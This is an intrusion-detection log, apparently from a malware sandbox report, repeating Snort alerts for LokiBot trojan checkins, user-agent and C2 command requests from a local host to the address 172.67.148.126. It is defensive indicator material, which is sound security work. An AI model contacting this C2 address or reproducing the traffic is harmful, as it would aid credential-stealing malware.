Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49753 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49753 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49753 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49753 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49755 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49755 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49755 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49755 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49755 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49756 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49756 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49756 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49756 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49756 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49757 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49757 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49757 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49757 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49757 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49758 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49758 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49758 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49758 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49758 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49759 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49759 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49759 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49759 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49759 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49760 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49760 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49760 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49760 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49760 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49761 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49761 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49761 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49761 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49761 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49762 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49762 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49762 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49762 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49762 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49763 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49763 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49763 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49763 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49763 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49764 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49764 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49764 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49764 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49764 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49765 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49765 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49765 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49765 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49765 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49766 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49766 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49766 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49766 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49766 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49767 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49767 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49767 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49767 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49767 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49768 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49768 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49768 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49768 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49768 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49769 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49769 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49769 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49769 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49769 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49770 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49770 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49770 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49770 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49770 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49771 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49771 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49771 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49771 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49771 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49772 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49772 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49772 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49772 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49772 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49773 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49773 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49773 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49773 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49773 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49774 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49774 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49774 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49774 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49774 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49775 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49775 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49775 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49775 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49775 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49776 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49776 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49776 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49776 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49776 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49777 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49777 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49777 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49777 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49777 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49778 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49778 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49778 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49778 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49778 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49780 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49780 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49780 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49780 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49780 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49781 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49781 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49781 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49781 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49781 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49782 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49782 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49782 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49782 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49782 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49784 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49784 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49784 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49784 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49784 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49785 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49785 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49785 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49785 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49785 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49786 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49786 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49786 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49786 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49786 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49787 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49787 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49787 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49787 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49787 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49788 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49788 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49788 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49788 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49788 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49789 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49789 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49789 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49789 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49789 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49790 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49790 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49790 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49790 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49790 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49791 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49791 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49791 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49791 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49791 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49792 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49792 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49792 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49792 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49792 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49793 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49793 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49793 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49793 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49793 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49794 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49794 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49794 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49794 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49794 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49795 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49795 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49795 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49795 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49795 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49796 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49796 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49796 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49796 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49796 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49797 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49797 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49797 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49797 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49797 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49798 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49798 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49798 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49798 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49798 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49799 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49799 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49799 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49799 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49799 -> 172.67.148.126:80
